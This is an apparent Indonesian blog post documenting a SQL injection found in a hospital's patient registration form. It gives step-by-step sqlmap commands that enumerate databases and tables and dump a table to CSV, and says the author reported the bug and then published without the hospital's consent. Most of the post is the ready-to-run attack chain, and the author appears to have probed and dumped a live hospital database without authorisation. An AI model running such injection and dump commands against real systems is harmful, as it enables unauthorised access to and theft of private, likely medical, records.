Saat akan daftar disalah satu rumah sakit tiba tiba kepikiran bisa gak sih form iin di inject?
POC
- Buka form pendaftaran, isikan dengan random data
- Intercept post data dengan OWASP ZAP
- Setelah itu coba dengan sqlmap
sqlmap -u https://redacted.com/index.php/CProsesDaftar/getpasien" --data="nomrm=Halo&tgllahir=2025-05-07&nik=9827982798279827&search=nomrm&tglperiksa=2023-12-07" --level 5 --risk 3 --banner --ignore-code 401 --technique=B --flush --dbs --threads 2
- Lihat isi table invoice
sqlmap -u "https://redacted.com/index.php/CProsesDaftar/getpasien" --data="nomrm=Halo&tgllahir=2025-05-07&nik=9827982798279827&search=nomrm&tglperiksa=2023-12-07" --level 5 --risk 3 --banner --ignore-code 401 --technique=B --flush --threads 2 -D redacted-database --tables
- Dump table
sqlmap -u "https://redacted.com/index.php/CProsesDaftar/getpasien" --data="nomrm=Halo&tgllahir=2025-05-07&nik=9827982798279827&search=nomrm&tglperiksa=2023-12-07" --level 5 --risk 3 --banner --ignore-code 401 --technique=B --flush --threads 2 -D redacted-database -T redacted-table --dump
- Hasil dump adalah file .csv yang jika dibuka akan menampilkan informasi dibawah ini
Timeline Bug Report
- Report bug ke admin: 9 Desember 2023
- Respons: Sampai tulisan ini terbit belum ada respons dari pihak terkait (tulisan ini saya terbitkan tanpa persetujuan pihak terkait, jika ada keberatan dari pihak terkait maka akan saya takedown)
- Bug status: Fixed
- Rewards: -